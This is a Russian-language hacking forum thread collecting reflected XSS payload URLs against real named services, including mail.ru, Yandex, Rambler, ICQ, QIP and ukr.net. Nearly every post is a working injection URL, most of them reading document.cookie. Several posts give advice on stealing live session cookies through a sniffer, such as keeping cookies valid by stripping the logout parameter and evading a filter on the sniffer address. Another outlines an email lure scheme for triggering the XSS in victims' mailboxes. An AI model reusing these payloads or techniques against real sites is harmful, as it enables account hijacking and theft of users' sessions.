Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    XSS на юкозe (работает только у авторизованных админов сайта)


    Не почтовый сервер, просто не нашел куда засунуть его :rolleyes:
     
    _________________________
    #61 Uex Urgent, 12 Oct 2009
    Last edited: 12 Oct 2009
    4 people like this.
  2. Gefasto

    Gefasto Member

    Joined:
    28 Sep 2009
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Пассивная xss на ngs.ru
    Code:
    http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&t=1&r=0
    
     
    #62 Gefasto, 16 Oct 2009
    Last edited: 16 Oct 2009
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=[color="Red"]IFRAME_HERE[/color]&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%258C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAw
    IFRAME
     
  4. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    хм... никогда этим не занимался. To

    Code:
    http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27%29%3C/script%3E
     
    1 person likes this.
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивки на рамблер

    Работает только у авторизованных (пробелы убрать)
     
    _________________________
    #65 Uex Urgent, 23 Oct 2009
    Last edited: 23 Oct 2009
  6. zpurgenz

    zpurgenz New Member

    Joined:
    24 Oct 2009
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    По поводу этой штуки работает многоходовка, да и работает ли...?
    Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
    Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке :) конечно если разослать миллиону товарищей то возможно эффект будет... :)

    ЗЫ Совсем забыла, XSS работает если в письме есть вложение.
     
    #66 zpurgenz, 25 Oct 2009
    Last edited: 25 Oct 2009
    1 person likes this.
  7. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивная xss на qip.ru


    работает только у авторизованных
     
    _________________________
    1 person likes this.
  8. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивка на mаil.ru, работает только у авторизованных



    пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание


     
    _________________________
    #68 Uex Urgent, 29 Oct 2009
    Last edited: 29 Oct 2009
  9. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    83
    Likes Received:
    140
    Reputations:
    16
    mail.ru
    имя: '"/><script>alert("xss");</script>
    © хз:)
     
    3 people like this.
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>
     
    2 people like this.
  11. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    такой вариант годится?

    http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1
     
    _________________________
    #71 Uex Urgent, 6 Nov 2009
    Last edited: 7 Nov 2009
    4 people like this.
  12. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

    в фильтре есть дырка ... кто сможет реадизовать ?
     
    2 people like this.
  13. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452

    так гораздо лучше
    http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

    запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....
     
    _________________________
    #73 Uex Urgent, 23 Nov 2009
    Last edited: 23 Nov 2009
    4 people like this.
  14. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E
     
    #74 Ruslan1817, 2 Dec 2009
    Last edited: 2 Dec 2009
    1 person likes this.
  15. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

    Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:

    Code:
    http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1
    
    http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script> 
    
    http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> 
    
    http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> 
    
    http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> 
    
    http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> 
    
    http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> 
    
    http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> 
    
    http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>
    
    http://foto.rambler.ru/introduce.htm...)%3C/script%3E
    
    http://uptime.ru/downtime.php?host_id="><script>alert()</script>"
    
    http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"
    
    http://mail.yandex.ru/r?url=javascript:alert();
    
     
    4 people like this.
  16. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    #76 Ruslan1817, 21 Dec 2009
    Last edited: 21 Dec 2009
  17. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22

    Видем внизу
    Текст:
    -«Вылетаю!»
    -«Встречайте!»
    -написать свой текст <---- он нам и нужен

    Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))
     
    1 person likes this.
  18. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>
     
    2 people like this.
  19. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E
     
    2 people like this.
  20. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E
     
    1 person likes this.